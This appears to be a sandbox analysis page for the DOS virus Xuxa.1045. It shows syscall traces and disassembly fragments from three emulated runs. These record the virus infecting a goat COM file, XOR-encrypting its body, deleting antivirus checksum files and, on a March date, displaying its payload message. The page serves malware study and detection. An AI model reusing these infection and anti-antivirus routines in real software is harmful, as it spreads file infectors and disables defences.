Sample viewer

vx.netlux.org/Virus.DOS.Xuxa.1045

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:54.841944126Z 11 PC: 12bba | Get input status
2018-12-17T22:57:54.845184497Z 250 PC: 12f96 | UNKNOWN!
2018-12-17T22:57:54.847349116Z 53 PC: 12cea | Get interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-17T22:57:54.84898984Z 53 PC: 12d0f | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:57:54.8506706Z 74 PC: 12d32 | Reallocate memory
2018-12-17T22:57:54.853157344Z 72 PC: 12d38 | Allocate memory
2018-12-17T22:57:54.855242423Z 37 PC: 12d60 | Set interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-17T22:57:54.856603973Z 37 PC: 12d6a | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:57:54.85847513Z 42 PC: 9f4f3 | Get date 0x9f4f3: cmp dh, 3
0x9f4f6: jne 0x9f4fb
0x9f4f8: jmp 0x9f6ea
0x9f4fb: pop dx
0x9f4fc: mov si, dx
0x9f4fe: push cs
0x9f4ff: pop es
0x9f500: mov cx, 0x41
0x9f503: mov al, byte ptr [si]
0x9f505: cmp al, 0
0x9f507: je 0x9f510
0x9f509: inc si
0x9f50a: dec cx
0x9f50b: jne 0x9f503
0x9f50d: jmp 0x9f522
0x9f50f: nop
0x9f510: mov cx, 0xb
0x9f513: mov di, 0x1fc
0x9f516: sub si, 0xb
0x9f519: repe cmpsb byte ptr [si], byte ptr es:[di]
2018-12-17T22:57:54.861324897Z 250 PC: 9f6e9 | UNKNOWN!
2018-12-17T22:57:54.862412451Z 53 PC: 9f531 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:57:54.864042596Z 37 PC: 9f545 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:57:54.866170306Z 67 PC: 9f6d2 | Get or set file attributes
2018-12-17T22:57:54.875887662Z 67 PC: 9f6df | Get or set file attributes
2018-12-17T22:57:55.220943535Z 61 PC: 9f55a | Open file (Filename = '')
2018-12-17T22:57:55.229332645Z 87 PC: 9f561 | Get or set file date and time
2018-12-17T22:57:55.231254648Z 63 PC: 9f57a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:55.23757621Z 66 PC: 9f6ca | Move file pointer
2018-12-17T22:57:55.240010406Z 44 PC: 9f5a4 | Get time 0x9f5a4: xor dh, dh
0x9f5a6: mov byte ptr cs:[0x117], dl
0x9f5ab: push bx
0x9f5ac: push cs
0x9f5ad: push cs
0x9f5ae: pop ds
0x9f5af: pop es
0x9f5b0: mov si, 0x100
0x9f5b3: mov di, 0x516
0x9f5b6: mov cx, 0x4e
0x9f5b9: rep movsb byte ptr es:[di], byte ptr [si]
0x9f5bb: mov dl, byte ptr [0x117]
0x9f5bf: mov cx, 0x3c7
0x9f5c2: mov al, byte ptr [si]
0x9f5c4: ror al, 5
0x9f5c7: xor al, dl
0x9f5c9: mov byte ptr es:[di], al
0x9f5cc: inc si
0x9f5cd: inc di
0x9f5ce: dec cx
2018-12-17T22:57:55.242992772Z 64 PC: 9f5dc | Write file or device (Write 1045 bytes on handle 5)
2018-12-17T22:57:55.252085354Z 66 PC: 9f6ca | Move file pointer
2018-12-17T22:57:55.254985757Z 64 PC: 9f5eb | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:55.258654833Z 87 PC: 9f602 | Get or set file date and time
2018-12-17T22:57:55.260502096Z 67 PC: 9f6df | Get or set file attributes
2018-12-17T22:57:55.271474271Z 65 PC: 9f649 | Delete file (Filename = 'C:\DOS\CHKLIST.MS')
2018-12-17T22:57:55.278308377Z 67 PC: 9f6df | Get or set file attributes
2018-12-17T22:57:55.284811462Z 65 PC: 9f649 | Delete file (Filename = 'C:\DOS\ANTI-VIR.DAT')
2018-12-17T22:57:55.292572651Z 62 PC: 9f65d | Close file
2018-12-17T22:57:55.314225323Z 67 PC: 9f6df | Get or set file attributes
2018-12-17T22:57:55.324740539Z 37 PC: 9f673 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:57:55.326020144Z 53 PC: 9f678 | Get interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-17T22:57:55.32835344Z 250 PC: 9f6e9 | UNKNOWN!
2018-12-17T22:57:55.330431025Z 37 PC: 12d7d | Set interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-17T22:57:55.332076077Z 250 PC: 12f96 | UNKNOWN!
2018-12-17T22:57:55.33376375Z 250 PC: 12f96 | UNKNOWN!
2018-12-17T22:57:55.334811619Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-17T22:57:55.339106924Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12713,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:05.350046053Z 11 PC: 12bba | Get input status
2018-12-25T12:36:05.353465455Z 250 PC: 12f96 | UNKNOWN!
2018-12-25T12:36:05.354145005Z 53 PC: 12cea | Get interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-25T12:36:05.355210067Z 53 PC: 12d0f | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:36:05.356879755Z 74 PC: 12d32 | Reallocate memory
2018-12-25T12:36:05.358226329Z 72 PC: 12d38 | Allocate memory
2018-12-25T12:36:05.359657686Z 37 PC: 12d60 | Set interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-25T12:36:05.368129457Z 37 PC: 12d6a | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:36:05.36980922Z 42 PC: 9f4f3 | Get date 0x9f4f3: cmp dh, 3
0x9f4f6: jne 0x9f4fb
0x9f4f8: jmp 0x9f6ea
0x9f4fb: pop dx
0x9f4fc: mov si, dx
0x9f4fe: push cs
0x9f4ff: pop es
0x9f500: mov cx, 0x41
0x9f503: mov al, byte ptr [si]
0x9f505: cmp al, 0
0x9f507: je 0x9f510
0x9f509: inc si
0x9f50a: dec cx
0x9f50b: jne 0x9f503
0x9f50d: jmp 0x9f522
0x9f50f: nop
0x9f510: mov cx, 0xb
0x9f513: mov di, 0x1fc
0x9f516: sub si, 0xb
0x9f519: repe cmpsb byte ptr [si], byte ptr es:[di]
2018-12-25T12:36:05.373781651Z 250 PC: 9f6e9 | UNKNOWN!
2018-12-25T12:36:05.376393158Z 53 PC: 9f531 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:05.377894995Z 37 PC: 9f545 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:05.37947283Z 67 PC: 9f6d2 | Get or set file attributes
2018-12-25T12:36:05.389095437Z 67 PC: 9f6df | Get or set file attributes
2018-12-25T12:36:05.72770917Z 61 PC: 9f55a | Open file (Filename = '')
2018-12-25T12:36:05.734520341Z 87 PC: 9f561 | Get or set file date and time
2018-12-25T12:36:05.736030648Z 63 PC: 9f57a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:05.741865986Z 66 PC: 9f6ca | Move file pointer
2018-12-25T12:36:05.748240504Z 44 PC: 9f5a4 | Get time 0x9f5a4: xor dh, dh
0x9f5a6: mov byte ptr cs:[0x117], dl
0x9f5ab: push bx
0x9f5ac: push cs
0x9f5ad: push cs
0x9f5ae: pop ds
0x9f5af: pop es
0x9f5b0: mov si, 0x100
0x9f5b3: mov di, 0x516
0x9f5b6: mov cx, 0x4e
0x9f5b9: rep movsb byte ptr es:[di], byte ptr [si]
0x9f5bb: mov dl, byte ptr [0x117]
0x9f5bf: mov cx, 0x3c7
0x9f5c2: mov al, byte ptr [si]
0x9f5c4: ror al, 5
0x9f5c7: xor al, dl
0x9f5c9: mov byte ptr es:[di], al
0x9f5cc: inc si
0x9f5cd: inc di
0x9f5ce: dec cx
2018-12-25T12:36:05.751646637Z 64 PC: 9f5dc | Write file or device (Write 1045 bytes on handle 5)
2018-12-25T12:36:05.758320132Z 66 PC: 9f6ca | Move file pointer (See above)
2018-12-25T12:36:05.759503944Z 64 PC: 9f5eb | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:05.76150698Z 87 PC: 9f602 | Get or set file date and time
2018-12-25T12:36:05.763301459Z 67 PC: 9f6df | Get or set file attributes (See above)
2018-12-25T12:36:05.769057437Z 65 PC: 9f649 | Delete file (Filename = 'C:\DOS\CHKLIST.MS')
2018-12-25T12:36:05.773836727Z 67 PC: 9f6df | Get or set file attributes (See above)
2018-12-25T12:36:05.778408591Z 65 PC: 9f649 | Delete file (See above)
2018-12-25T12:36:05.782709428Z 62 PC: 9f65d | Close file
2018-12-25T12:36:05.788369671Z 67 PC: 9f6df | Get or set file attributes (See above)
2018-12-25T12:36:05.797710714Z 37 PC: 9f673 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:05.799654976Z 53 PC: 9f678 | Get interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-25T12:36:05.803911951Z 250 PC: 9f6e9 | UNKNOWN! (See above)
2018-12-25T12:36:05.805375246Z 37 PC: 12d7d | Set interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-25T12:36:05.806556311Z 250 PC: 12f96 | UNKNOWN! (See above)
2018-12-25T12:36:05.807345359Z 250 PC: 12f96 | UNKNOWN! (See above)
2018-12-25T12:36:05.808718183Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:36:05.814231962Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12713,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:05.364272518Z 11 PC: 12bba | Get input status
2018-12-25T12:36:05.371484628Z 250 PC: 12f96 | UNKNOWN!
2018-12-25T12:36:05.372531253Z 53 PC: 12cea | Get interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-25T12:36:05.373707092Z 53 PC: 12d0f | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:36:05.375592027Z 74 PC: 12d32 | Reallocate memory
2018-12-25T12:36:05.377285979Z 72 PC: 12d38 | Allocate memory
2018-12-25T12:36:05.379096079Z 37 PC: 12d60 | Set interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-25T12:36:05.380747884Z 37 PC: 12d6a | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:36:05.3830424Z 42 PC: 9f4f3 | Get date 0x9f4f3: cmp dh, 3
0x9f4f6: jne 0x9f4fb
0x9f4f8: jmp 0x9f6ea
0x9f4fb: pop dx
0x9f4fc: mov si, dx
0x9f4fe: push cs
0x9f4ff: pop es
0x9f500: mov cx, 0x41
0x9f503: mov al, byte ptr [si]
0x9f505: cmp al, 0
0x9f507: je 0x9f510
0x9f509: inc si
0x9f50a: dec cx
0x9f50b: jne 0x9f503
0x9f50d: jmp 0x9f522
0x9f50f: nop
0x9f510: mov cx, 0xb
0x9f513: mov di, 0x1fc
0x9f516: sub si, 0xb
0x9f519: repe cmpsb byte ptr [si], byte ptr es:[di]
2018-12-25T12:36:05.385481303Z 9 PC: 9f6f1 | Display string (String= 'Si no viste el Show de Xuxa por T.V, ni en vivo... ahora podes verlo en tu PC!. - XOU DA XUXA 1.3 By Leviathan.')